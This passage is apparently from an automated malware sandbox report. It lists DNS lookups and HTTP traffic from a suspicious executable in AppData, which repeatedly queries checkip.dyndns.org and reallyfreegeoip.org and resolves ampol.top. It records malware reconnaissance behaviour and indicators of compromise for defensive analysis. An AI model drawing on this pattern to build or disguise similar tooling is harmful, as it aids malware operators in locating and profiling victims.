                    Jul 1, 2024 20:06:17.243422031 CEST5471953192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:17.259255886 CEST53547198.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:17.977180004 CEST4988153192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:17.984749079 CEST53498818.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:18.669584990 CEST5499853192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:18.675920010 CEST53549988.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:18.678231001 CEST5278153192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:18.684806108 CEST53527818.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:18.684961081 CEST5278153192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:18.691688061 CEST53527818.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:19.179575920 CEST6392653192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:19.187002897 CEST53639268.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:19.187179089 CEST6392653192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:19.199649096 CEST53639268.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:19.836941957 CEST6551053192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:19.843449116 CEST53655108.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:19.845614910 CEST6267253192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:19.852303028 CEST53626728.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:21.482923985 CEST5647553192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:21.494229078 CEST53564758.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:22.124891043 CEST4938453192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:22.132004976 CEST53493848.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:22.134511948 CEST5484253192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:22.141232967 CEST53548428.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:22.744748116 CEST5810553192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:22.756479979 CEST53581058.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:23.445455074 CEST6492853192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:23.451953888 CEST53649288.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:23.455499887 CEST5739053192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:23.461724043 CEST53573908.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:23.973303080 CEST5809553192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:23.990027905 CEST53580958.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:24.649343014 CEST5426153192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:24.661016941 CEST53542618.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:24.663788080 CEST6050753192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:24.670028925 CEST53605078.8.8.8192.168.2.22
                    Jul 1, 2024 20:06:25.171133995 CEST5044653192.168.2.228.8.8.8
                    Jul 1, 2024 20:06:25.179678917 CEST53504468.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 1, 2024 20:06:07.536602974 CEST192.168.2.228.8.8.80xa2c2Standard query (0)ampol.topA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.596666098 CEST192.168.2.228.8.8.80xae9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.833112001 CEST192.168.2.228.8.8.80xc115Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:15.521397114 CEST192.168.2.228.8.8.80x31c9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.129812956 CEST192.168.2.228.8.8.80x23eeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.232973099 CEST192.168.2.228.8.8.80xcf79Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.243422031 CEST192.168.2.228.8.8.80xcf79Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.977180004 CEST192.168.2.228.8.8.80x7ff8Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.669584990 CEST192.168.2.228.8.8.80x87adStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.678231001 CEST192.168.2.228.8.8.80xcddaStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.684961081 CEST192.168.2.228.8.8.80xcddaStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.179575920 CEST192.168.2.228.8.8.80x3812Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.187179089 CEST192.168.2.228.8.8.80x3812Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.836941957 CEST192.168.2.228.8.8.80xbae3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.845614910 CEST192.168.2.228.8.8.80x8a3bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:21.482923985 CEST192.168.2.228.8.8.80x1b9eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.124891043 CEST192.168.2.228.8.8.80xa772Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.134511948 CEST192.168.2.228.8.8.80x9f6fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.744748116 CEST192.168.2.228.8.8.80xaf1fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.445455074 CEST192.168.2.228.8.8.80x9e69Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.455499887 CEST192.168.2.228.8.8.80x2e18Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.973303080 CEST192.168.2.228.8.8.80x4f9eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.649343014 CEST192.168.2.228.8.8.80x41d8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.663788080 CEST192.168.2.228.8.8.80xb21aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:25.171133995 CEST192.168.2.228.8.8.80x7a55Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 1, 2024 20:06:07.550009966 CEST8.8.8.8192.168.2.220xa2c2No error (0)ampol.top104.21.53.203A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:07.550009966 CEST8.8.8.8192.168.2.220xa2c2No error (0)ampol.top172.67.218.176A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.605909109 CEST8.8.8.8192.168.2.220xae9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:13.605909109 CEST8.8.8.8192.168.2.220xae9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.605909109 CEST8.8.8.8192.168.2.220xae9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.605909109 CEST8.8.8.8192.168.2.220xae9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.605909109 CEST8.8.8.8192.168.2.220xae9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.605909109 CEST8.8.8.8192.168.2.220xae9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.839656115 CEST8.8.8.8192.168.2.220xc115No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:13.839656115 CEST8.8.8.8192.168.2.220xc115No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.839656115 CEST8.8.8.8192.168.2.220xc115No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.839656115 CEST8.8.8.8192.168.2.220xc115No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.839656115 CEST8.8.8.8192.168.2.220xc115No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:13.839656115 CEST8.8.8.8192.168.2.220xc115No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:15.534264088 CEST8.8.8.8192.168.2.220x31c9No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:15.534264088 CEST8.8.8.8192.168.2.220x31c9No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.151537895 CEST8.8.8.8192.168.2.220x23eeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:17.151537895 CEST8.8.8.8192.168.2.220x23eeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.151537895 CEST8.8.8.8192.168.2.220x23eeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.151537895 CEST8.8.8.8192.168.2.220x23eeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.151537895 CEST8.8.8.8192.168.2.220x23eeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.151537895 CEST8.8.8.8192.168.2.220x23eeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.241972923 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:17.241972923 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.241972923 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.241972923 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.241972923 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.241972923 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.259255886 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:17.259255886 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.259255886 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.259255886 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.259255886 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.259255886 CEST8.8.8.8192.168.2.220xcf79No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.984749079 CEST8.8.8.8192.168.2.220x7ff8No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:17.984749079 CEST8.8.8.8192.168.2.220x7ff8No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.675920010 CEST8.8.8.8192.168.2.220x87adNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:18.675920010 CEST8.8.8.8192.168.2.220x87adNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.675920010 CEST8.8.8.8192.168.2.220x87adNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.675920010 CEST8.8.8.8192.168.2.220x87adNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.675920010 CEST8.8.8.8192.168.2.220x87adNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.675920010 CEST8.8.8.8192.168.2.220x87adNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.684806108 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:18.684806108 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.684806108 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.684806108 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.684806108 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.684806108 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.691688061 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:18.691688061 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.691688061 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.691688061 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.691688061 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.691688061 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.187002897 CEST8.8.8.8192.168.2.220x3812No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.187002897 CEST8.8.8.8192.168.2.220x3812No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.199649096 CEST8.8.8.8192.168.2.220x3812No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.199649096 CEST8.8.8.8192.168.2.220x3812No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:21.494229078 CEST8.8.8.8192.168.2.220x1b9eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:21.494229078 CEST8.8.8.8192.168.2.220x1b9eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.756479979 CEST8.8.8.8192.168.2.220xaf1fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.756479979 CEST8.8.8.8192.168.2.220xaf1fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.990027905 CEST8.8.8.8192.168.2.220x4f9eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.990027905 CEST8.8.8.8192.168.2.220x4f9eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:25.179678917 CEST8.8.8.8192.168.2.220x7a55No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:25.179678917 CEST8.8.8.8192.168.2.220x7a55No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • ampol.top
                    • reallyfreegeoip.org
                    • checkip.dyndns.org

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249164158.101.44.242803244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    Jul 1, 2024 20:06:13.880681992 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:14.596788883 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:14 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: bfafaf2268caa8f0ef2bab45bef729c5
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:14.681226969 CEST127OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 1, 2024 20:06:14.855660915 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:14 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: cd79b36b59ca5af32b4109d71c045e25
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:15.079313993 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:14 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: cd79b36b59ca5af32b4109d71c045e25
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:16.297147036 CEST127OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
